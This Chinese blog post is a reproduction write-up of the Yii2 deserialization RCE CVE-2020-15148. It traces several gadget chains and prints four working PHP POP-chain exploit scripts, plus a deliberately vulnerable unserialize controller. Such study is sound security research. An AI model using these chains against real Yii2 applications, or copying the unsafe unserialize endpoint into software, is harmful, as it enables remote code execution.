yii反序列化漏洞复现及利用

最新推荐文章于 2024-05-13 00:22:59 发布
最新推荐文章于 2024-05-13 00:22:59 发布
阅读量5.4k 收藏 9
点赞数 3
分类专栏: web安全 php反序列化 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44576725/article/details/123986819
版权

yii反序列化漏洞

Yii框架

Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。

Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。

Yii 当前有两个主要版本:1.1 和 2.0。 1.1 版是上代的老版本,现在处于维护状态。 2.0 版是一个完全重写的版本,采用了最新的技术和协议,包括依赖包管理器 Composer、PHP 代码规范 PSR、命名空间、Traits(特质)等等。 2.0 版代表新一代框架,是未来几年中我们的主要开发版本。

Yii 2.0 还使用了 PHP 的最新特性, 例如命名空间 和Trait(特质)

漏洞描述

yii2.2.0.38之前的版本存在反序列化漏洞,程序在调用unserialize时,攻击者可以通过构造特定的恶意请求执行RCE,CVE编号是CVE-2020-15148.

2.0.38已修复该漏洞,官方的修复方法:

在yii\db\BatchQueryResult类增加了一个__wakeup()函数,函数内容为:当BatchQueryResult类被反序列化时直接报错,wakeup()方法在类被反序列化会自动调用,这样也就避免了反序列化的发生,避免了漏洞。

环境复现

本地使用phpstudy搭建,将Yii的demo下载下来:

https://github.com/yiisoft/yii2/releases/tag/2.0.37

image-20220405150922884

修改/config/web.php里的cookieValidationKey为任何值,不然会报错:
image-20220405151034659

进入目录,执行 php yii serve

image-20220405151201210

进入http:localhost:8080

image-20220405151252335

前置知识点

namespace:

PHP: 命名空间概述 - Manual

php中命名空间(namespace)的作用和使用_古语静水流深-CSDN博客

PHP命名空间(Namespace)的使用详解 - 酷越 - 博客园

call_user_func_array()

[Yii2.0 路由(Route)的实现原理 2.0 版本 ]

所谓路由是指URL中用于标识用于处理用户请求的module, controller, action的部分,一般情况下由 r 查询参数来指定。
如 http://www.digpage.com/index.php?r=post/view&id=100 ,表示这个请求将由PostController 的 actionView来处理。(主要首字母要大写)

__construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。

__destruct():当对象被销毁时会自动调用。

__call():是在对象上下文中调用不可访问的方法时触发

由于是反序列化利用链,我们需要一个入口点,在controllers目录下创建一个Controller:

controllers/TestController.php:

url:http:localhost:8080/?r=test/test&data=xxx

<?php

namespace app\controllers;

class TestController extends \yii\web\Controller
{
    public function actionTest($data)
    {
        return unserialize(base64_decode($data));
    }
  
}

漏洞分析

漏洞触发点在\yii-2.0.37\vendor\yiisoft\yii2\db\BatchQueryResult.php文件中

/**
     * Destructor.
     */
    public function __destruct()
    {
        // make sure cursor is closed
        $this->reset();
    }

    /**
     * Resets the batch query.
     * This method will clean up the existing batch query so that a new batch query can be performed.
     */
    public function reset()
    {
        if ($this->_dataReader !== null) {
            $this->_dataReader->close();
        }
        $this->_dataReader = null;
        $this->_batch = null;
        $this->_value = null;
        $this->_key = null;
    }

__destruct()跟进reset(),继续跟进close(),发现close()里没有利用点。但是这里的 _dataRender是可控的,可以触发__call方法进行利用。

当一个对象调用不可访问的close方法或者类中没有close方法,即可触发 __call。全局搜索一下 __call方法,在\vendor\fzaninotto\faker\src\Faker\Generator.php中找到了合适的方法:

 /**
     * @param string $method
     * @param array $attributes
     *
     * @return mixed
     */
    public function __call($method, $attributes)
    {
        return $this->format($method, $attributes);
    }

这里的$methodclose函数,$attributes为空,因为close函数形参为空。继续跟进format方法

public function format($formatter, $arguments = array())
    {
        return call_user_func_array($this->getFormatter($formatter), $arguments);
    }

发现了call_user_func_array()函数,看到了一丝希望。在这里解释一下call_user_func_array()函数:

call_user_func_array:调用回调函数,并把一个数组参数作为回调函数的参数

使用方法:

call_user_func_array(callable $callback, array $param_arr): mixed 
callback
    被调用的回调函数。
param_arr
    要被传入回调函数的数组,这个数组得是索引数组。

示例:

<?php
namespace Foobar;
class Foo {
    static public function test($name) {
        print "Hello {$name}!\n";
    }
}
// As of PHP 5.3.0
call_user_func_array(__NAMESPACE__ .'\Foo::test', array('Hannes'));
//输出:Hello Hannes

// As of PHP 5.3.0
call_user_func_array(array(__NAMESPACE__ .'\Foo', 'test'), array('Philip'));
//输出:Hello Philip
?>

继续跟进getFormmatter函数:

/**
     * @param string $formatter
     *
     * @return Callable
     */
    public function getFormatter($formatter)
    {
        if (isset($this->formatters[$formatter])) {
            return $this->formatters[$formatter];
        }
        foreach ($this->providers as $provider) {
            if (method_exists($provider, $formatter)) {
                $this->formatters[$formatter] = array($provider, $formatter);

                return $this->formatters[$formatter];
            }
        }
        throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
    }

关注前半部分,发现$this->formatters是可控的,因此getFormmatter方法的返回值也是可控的,因此在call_user_func_array($this->getFormatter($formatter), $arguments);中,第一个参数可控,第二个参数为空。

这时候就需要一个执行类,类中的方法需要满足两个条件:

  1. 方法所需的参数为自己类中存在的参数
  2. 方法需要有命令执行的功能

参考了一些大师傅的思路,call_user_func函数很符合以上的方法,这里介绍一下call_user_func

call_user_func:把第一个参数作为回调函数调用,这里用call_user_func即可达到RCE的作用。

好了,找一下带有call_user_func的类:

构造正则

function \w*\(\)\n? *\{(.*\n)+ *call_user_func
image-20220405212253123

找到了两个适合的类方法run:

yii\rest\CreateAction::run(), $this->checkAccess, $this->id两个参数可控

public function run()
    {
        if ($this->checkAccess) {
            call_user_func($this->checkAccess, $this->id);
        }

      	...

        return $model;
    }

yii\rest\IndexAction::run(), $this->checkAccess, $this->id两个参数可控

public function run()
    {
        if ($this->checkAccess) {
            call_user_func($this->checkAccess, $this->id);
        }

      return $this->prepareDataProvider();
    }

好了,POP链到此结束。整理一下:

yii\db\BatchQueryResult::__destruct()->reset()->close()
↓↓↓
Fake\Generator::__call()->format()->call_user_func_array
↓↓↓
yii\rest\IndexAction::run()->call_user_func

构造POC:

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct()
        {
            $this->checkAccess = 'phpinfo';
            $this->id = '1'; // rce
        }
    }
}

namespace Faker{
    use yii\rest\IndexAction;

    class Generator{
        protected $formatters;
        public function __construct()
        {
            $this->formatters['close'] = [new IndexAction(),'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader = new Generator();
        }
    }

}

namespace {
    use yii\db\BatchQueryResult;
    echo base64_encode(serialize(new BatchQueryResult()));
}

image-20220405215636196

成功复现。

其他pop链

其实还可以找到其他的pop链,还是以BatchQueryResult类的__destruct作为起点。还是跟到$this->_dataReader->close();,但是这次不以__ __call为跳板,而是寻找确实存在close方法的一个类,而且这个类的close方法可以利用。经过寻找,找到了yii\web\DbSession这个类:

  public function close()
    {
        if ($this->getIsActive()) {
            // prepare writeCallback fields before session closes
            $this->fields = $this->composeFields();
            YII_DEBUG ? session_write_close() : @session_write_close();
        }
    }

跟进getIsActive(),发现无法利用,跟进$this->composeFields();:

protected function composeFields($id = null, $data = null)
    {
        $fields = $this->writeCallback ? call_user_func($this->writeCallback, $this) : [];
        if ($id !== null) {
            $fields['id'] = $id;
        }
        if ($data !== null) {
            $fields['data'] = $data;
        }
        return $fields;
    }

出现了call_user_func函数:$this->writeCallback ? call_user_func($this->writeCallback, $this),且$this->writeCallback可控,因此调回的回调函数可控。

因此这里可以调用前面那条链的run方法,实现RCE。

整理一下POP链:

yii\db\BatchQueryResult::__destruct()->reset()->close()
↓↓↓
yii\web\DbSession::close()->composeFields()->call_user_func()
↓↓↓
yii\rest\IndexAction::run()->call_user_func()

POC如下:

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct()
        {
            $this->checkAccess = 'phpinfo';
            $this->id = '1'; // rce
        }
    }
}

namespace yii\web{
    use yii\rest\IndexAction;

    class DbSession{
        public $writeCallback;
        public function __construct()
        {
            $this->writeCallback = [new IndexAction(),'run'];
        }
    }
}

namespace yii\db{
    use yii\web\DbSession;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader = new DbSession();
        }
    }

}

namespace {
    use yii\db\BatchQueryResult;
    echo base64_encode(serialize(new BatchQueryResult()));
}

image-20220405233808886

成功复现。

针对2.0.38版本

POC-1

yii2.0.38做了如下更新,借用feng师傅的图

image-20220405234023595

增加了__wakeup(),在反序列化时直接抛出异常,因此以BatchQueryResult为起点的这条链在2.0.38里算是不行了。因此再继续复习学习一下大师傅们针对2.0.38挖掘的其他新链。

类比上一条链的思路,yii2只是限制了batchQueryResult类不能进行反序列化,但是后面的__cal以及之后的链都是完好无损的,因此想找一条新的链,最快的方式就是再找一个存在__destruct这样的利用点,然后正好类中的一个属性调用了一个方法,而且这个属性我们可控,那么就是一条新链了。
全局找一下__destruct,经过排查,发现RunProcess类的__destruct可以利用:

public function __destruct()
{
	$this->stopProcess();	
}

继续跟进:

    public function stopProcess()
    {
        foreach (array_reverse($this->processes) as $process) {
            /** @var $process Process  **/
            if (!$process->isRunning()) {
                continue;
            }
            $this->output->debug('[RunProcess] Stopping ' . $process->getCommandLine());
            $process->stop();
        }
        $this->processes = [];
    }

因为 t h i s − > p r o c e s s e s 可 控 , 所 以 this->processes可控,所以 this>processesprocess可控。这里$process->isRunning(),调用isRunning方法,因此又可以触发__call,然后继续反序列化。

构造POC:

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct()
        {
            $this->checkAccess = 'phpinfo';
            $this->id = '1'; // rce
        }
    }
}

namespace Faker{
    use yii\rest\IndexAction;

    class Generator{
        protected $formatters;
        public function __construct()
        {
            $this->formatters['isRunning'] = [new IndexAction(),'run'];
        }
    }
}

namespace Codeception\Extension{
    use Faker\Generator;

    class RunProcess{
        private $processes = [];
        public function __construct()
        {
            $this->processes[] = new Generator();
        }
    }

}

namespace {
    use Codeception\Extension\RunProcess;
    echo base64_encode(serialize(new RunProcess()));
}

image-20220405235504339

复现成功。

POC-2

还是看__destruct,发现\vendor\swiftmailer\swiftmailer\lib\classes\Swift\KeyCache\DiskKeyCache.php中的Swift_KeyCache_DiskKeyCache类可以利用:

public function __destruct()
    {
        foreach ($this->keys as $nsKey => $null) {
            $this->clearAll($nsKey);
        }
    }

跟进clearAll()

public function clearAll($nsKey)
{
    if (array_key_exists($nsKey, $this->keys)) {
        foreach ($this->keys[$nsKey] as $itemKey => $null) {
            $this->clearKey($nsKey, $itemKey);
        }
        if (is_dir($this->path.'/'.$nsKey)) {
            rmdir($this->path.'/'.$nsKey);
        }
        unset($this->keys[$nsKey]);
    }
}

继续跟进clearKey发现没有利用点,触发不了__call,不过看到了$this->path.'/'.$nsKey,存在字符串拼接问题,而$this->path$nsKey都是我们可控的,因此可以触发__toString。全局搜索一波,可以找到很多:

可以找到好多可以利用的__toString,我这里找到了vendor\phpDocumentor\Reflection\DocBlock\Tags\Covers.php里的

public function __toString() : string
    {
        return $this->refers . ($this->description ? ' ' . $this->description->render() : '');
    }

看到了$this->description->render(),又可以利用__call了,于是第二条POP链又成了。

构造POC-2:

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '1';
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters['render'] = [new IndexAction(), 'run'];
        }
    }
}
namespace phpDocumentor\Reflection\DocBlock\Tags{

    use Faker\Generator;

    class Covers
    {
        protected $description;
        public function __construct(){
            $this->description=new Generator();
        }
    }
}

namespace{
    
    use phpDocumentor\Reflection\DocBlock\Tags\Covers;
    class Swift_KeyCache_DiskKeyCache
    {
        private $keys = [];
        private $path;
        public function __construct(){
            $this->path=new Covers();
            $this->keys=array(
                'hello'=>'world'
            );
        }
    }

    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}

image-20220406004903894

复现成功。

总结

在ctfshow做题时遇到了yii反序列化,写这篇文章来记录下yii反序列化漏洞的利用以及复现,以后或许可以用得到,主要就是__destruct,__call,__toString等魔术方法的灵活使用和call_user_func、call_user_func_array的利用。

拓海AE
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Yii2 反序列化漏洞(CVE-2020-15148)复现
锋刃科技的博客
12-16 9318
漏洞概述 Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。 环境搭建 到github上下载yii2的2.0.37版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 然后修改/config/web.php文件17行cookieValidationKey,可以随便定义 ...
从某达OA到Yii2框架的cookie反序列化漏洞研究
HUANGXIN9898的博客
10-05 543
自身的一个tdAuthcode加解密函数来加密payload**,从而可以绕过一些防御检测。某达oa。
CVE-2020-15148 Yii反序列化漏洞复现
绮洛Ki1ro的博客
08-05 852
CVE-2020-15148 Yii反序列化漏洞复现
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞_奇安信天擎漏洞(1)
最新发布
2401_84302761的博客
05-13 839
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞
m0_46699477的博客
07-19 2207
奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天擎”)产品。奇安信天擎终端安全管理系统web部分使用yii框架 该版本框架自带反序列化入口点,攻击者可执行任意代码获取服务器权限。
yii2.0.37反序列化漏洞审计
soufaker的安全屋
12-16 611
网上很多师傅都有审计yii2.0.37反序列化漏洞,自己也弄来学习学习
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞_奇安信天擎漏洞
2301_81327376的博客
04-13 617
奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天擎”)产品。奇安信天擎终端安全管理系统web部分使用yii框架 该版本框架自带反序列化入口点,攻击者可执行任意代码获取服务器权限。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。奇安信天擎终端安全管理系统web部分使用yii框架 该版本框架自带反序列化入口点,攻击者可执行任意代码获取服务器权限。
yii2 反序列化漏洞复现与分析
meteox的博客
11-29 870
环境搭建 漏洞yii2.0.38之前的版本,下载2.0.37basic版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 修改/config/web文件的值 在当前目录输入php yii serve启动 复现 先构造反序列化的入口 新建一个controller <?php namespace app\controllers; class SerController extends \yii\web\Controller {
yii2 反序列化写shell方式利用1
08-03
yii2 反序列化写 shell 式利 - 原创章发潜习安全遇到个 yii 的源码刚好有漏洞,搜了圈的 rce 都是调 call_user_func 直接sys
Yii框架反序列化RCE利用链分析1
08-03
本文主要探讨了Yii2框架中的反序列化 Remote Code Execution (RCE)漏洞利用链的分析和构造过程。 首先,让我们理解反序列化漏洞的基本概念。在PHP中,`unserialize()`函数用于将序列化的字符串还原为PHP的对象或...
YII框架模块化处理操作示例
10-17
主要介绍了YII框架模块化处理操作,结合实例形式分析了Yii框架模块化操作实现方法及相关注意事项,需要的朋友可以参考下
Yii遍历行下每列数据的方法
10-21
主要介绍了Yii遍历行下每列数据的方法,结合实例形式分析了Yii框架下数据遍历的相关操作技巧,需要的朋友可以参考下
15-PHP代码审计——yii 2.0.37反序列化漏洞
网络安全
06-06 1188
Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在反序列化漏洞,如果程序内部调用了unserialize() 反序列化时,那么程序就可能存在反序列化漏洞,攻击者可通过构造特定的恶意请求执行任意命令。 影响版本: yii2 v2.0.37版本以下 环境: yii-basic-app-2.0.37.tgz php7.0以上 poc: http://www.yii2.com/web/index.php?r=test/sss&.
YII 2.0.38反序列化代码审计
qq_49422880的博客
02-15 3183
开始找反序列化的入口点, namespace Codeception\Extension; __destruct()调用stopProcess()然后会调用isRunning(),processes变量是可控的会调__call()函数,然后接上之后的反序列化的链子。继续往下看。 namespace Faker; __call()调用format()函数,这里有一个回调函数来使用。然后getFormatter()函数,但是这里的formatters变量是可控的,那么这里只需要调用一个无参的函数即可。
php探针入侵,【防护方案】Yii2 反序列化远程命令执行漏洞 (CVE-2020-15148)
weixin_36012511的博客
03-28 799
一、综述近日监测到,Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。Yii2 是...
Yii2数据安全查询,防止sql注入漏洞
xmlife的专栏
12-18 9930
1 $id = Yii::$app->request->get('id','');//get获取参数 1.1 直接把获取的$id代入(有问题) 1 2 3 4 5 $sql     = "SELECT * FROM   tab WHERE id = {$id}"; $db
yii2框架 反序列化漏洞复现
feng的博客
02-16 3728
前言 最近学习PHP反序列化的时候遇到了yii2反序列化利用,就顺便搭了一下环境,跟着网上各种大师傅们的文章进行了一波复现和学习,提高自己代码审计的能力。 漏洞出现在yii2.0.38之前的版本中,在2.0.38进行了修复,CVE编号是CVE-2020-15148: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls unserialize()
Yii2 反序列化漏洞复现
qq_44657899的博客
09-23 786
文章目录漏洞详情环境搭建漏洞复现 漏洞详情 漏洞版本小于yii2.0.38 环境搭建 下载yii2.0.37版本,https://github.com/yiisoft/yii2/releases/tag/2.0.37, 放在phpstudy的www目录下。 这是一个反序列化利用链,所以还需要一个反序列化的入口点,在controllers目录下创建一个TestController.php <?php namespace app\controllers; use Yii; use yii\web\Cont
yii2框架利用PhpSpreadsheet写导入功能
05-11
Yii2框架可以使用PhpSpreadsheet库来读取Excel文件并将其导入到数据库中。 以下是一个简单的示例: 1. 首先,您需要在您的项目中安装PhpSpreadsheet库。您可以通过在终端中导航到您的项目目录并运行以下命令来完成安装: ``` composer require phpoffice/phpspreadsheet ``` 2. 创建一个控制器和一个视图来处理文件上传和导入: 控制器: ```php <?php namespace app\controllers; use Yii; use yii\web\Controller; use yii\web\UploadedFile; use PhpOffice\PhpSpreadsheet\IOFactory; class ImportController extends Controller { public function actionIndex() { // 处理文件上传 if (Yii::$app->request->isPost) { $file = UploadedFile::getInstanceByName('file'); // 读取Excel文件 $reader = IOFactory::createReader('Xlsx'); $spreadsheet = $reader->load($file->tempName); $worksheet = $spreadsheet->getActiveSheet(); // 读取数据并将其插入到数据库中 foreach ($worksheet->getRowIterator() as $row) { $rowData = $row->toArray(null, true, true, true); // 将数据插入到数据库中 } Yii::$app->session->setFlash('success', '导入成功'); } return $this->render('index'); } } ``` 视图: ```php <?php use yii\widgets\ActiveForm; ?> <?php $form = ActiveForm::begin(['options' => ['enctype' => 'multipart/form-data']]) ?> <?= $form->field($model, 'file')->fileInput() ?> <button type="submit" class="btn btn-primary">导入</button> <?php ActiveForm::end() ?> ``` 3. 运行应用程序并导航到“/ import”路由。选择要导入的Excel文件并提交表单。 这是一个简单的示例,您可以根据需要进行修改和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值